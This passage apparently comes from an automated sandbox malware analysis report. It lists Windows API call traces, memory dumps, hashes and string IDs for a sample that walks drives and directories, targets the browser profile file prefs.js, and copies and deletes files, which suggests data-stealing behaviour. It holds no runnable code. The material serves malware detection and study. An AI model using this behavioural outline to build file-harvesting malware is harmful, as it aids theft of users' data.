                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                    • API String ID: 441469471-147700698
                                                                                                                                                                                                                                                    • Opcode ID: ef4712593b3c0b7893bf5e29b3a273b9fd04f87b3e175aff2525b6b7816ea85c
                                                                                                                                                                                                                                                    • Instruction ID: 2ce73915ebe5ac77f929f743006d81168c73373098e51a3742ff7ddd3e630518
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4712593b3c0b7893bf5e29b3a273b9fd04f87b3e175aff2525b6b7816ea85c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4512BB190021CAFDF719F61DC85BDEBBB9FB05301F004195EA48A6112EB319E49DF55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0008CD5C
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0008CD73
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B74EC), ref: 0008CD94
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B74F0), ref: 0008CDAE
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(0008D3B5,000B6872,000B74F4,?,000B686F), ref: 0008CE41
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,000B750C,000B6873,?,000B7508,000B7504,000B7500,000B74FC), ref: 0008D122
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008D136
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0008D23C
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0008D250
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                                                                                                    • String ID: %s\*.*
                                                                                                                                                                                                                                                    • API String ID: 3967855609-1013718255
                                                                                                                                                                                                                                                    • Opcode ID: fb4d4a9be4b78307fa874a62f4ca31192565e083f98b2c7e423c48c137e59710
                                                                                                                                                                                                                                                    • Instruction ID: 76672085d22d057c85ddd3ed6c62135072767544f6df6ec3c8d83642777e2141
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb4d4a9be4b78307fa874a62f4ca31192565e083f98b2c7e423c48c137e59710
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D1A5329021299FEF61FB24DD46ADDB7B4AF44304F4140E1E958B7163DB30AE8A9F91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,000B7570,000B68A3,?,?,?), ref: 0008D647
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7574), ref: 0008D668
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7578), ref: 0008D682
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,000B757C,?,000B68AE), ref: 0008D70E
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008D7E8
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008D8B3
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0008D956
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0008D96A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                    • String ID: prefs.js
                                                                                                                                                                                                                                                    • API String ID: 893096357-3783873740
                                                                                                                                                                                                                                                    • Opcode ID: 81e1c17deccb1a5f427406fb91c64b1b3f5a03d5bf532cd29d151c585d64fa43
                                                                                                                                                                                                                                                    • Instruction ID: 4430173b8545abbf8eac73fc61fb5ebbba3ad5735d5f4ae5047b4a4bd72f9f8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81e1c17deccb1a5f427406fb91c64b1b3f5a03d5bf532cd29d151c585d64fa43
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA1E5319006289FDF60BB64EC46BCD77B4BF45310F4101E1E988B7252EB30AE9A9F91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,\*.*,000B6826,?,?,?), ref: 0008B99B
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B743C), ref: 0008B9BC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7440), ref: 0008B9D6
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0008BE0B
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008BE82
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0008BEF1
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0008BF05
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                    • API String ID: 2055012574-1173974218
                                                                                                                                                                                                                                                    • Opcode ID: be0b3690430d85b6b9585045823b90713213767a6e07d2b12e1520556c5ad985
                                                                                                                                                                                                                                                    • Instruction ID: 627fc64ae0af26029e944f2c15d023df4a46f61cc54c6104ef79b8f45121a412
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0b3690430d85b6b9585045823b90713213767a6e07d2b12e1520556c5ad985
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43E16131950529DFCF21FB24DD4AACDB7B4BF44305F4140E1A998BB122DB35AE8A9F90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,000B7424,000B6822,?,?,?), ref: 0008B657
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7428), ref: 0008B678
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B742C), ref: 0008B692
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7430,?,000B6823), ref: 0008B71F
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0008B780
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 0008ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0008AC8A
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0008B8EB
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0008B8FF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3801961486-0
                                                                                                                                                                                                                                                    • Opcode ID: c96dfccbac96231e21a8e4109e8825dc9a36b00a4ded0dbdb277477a508a3d72
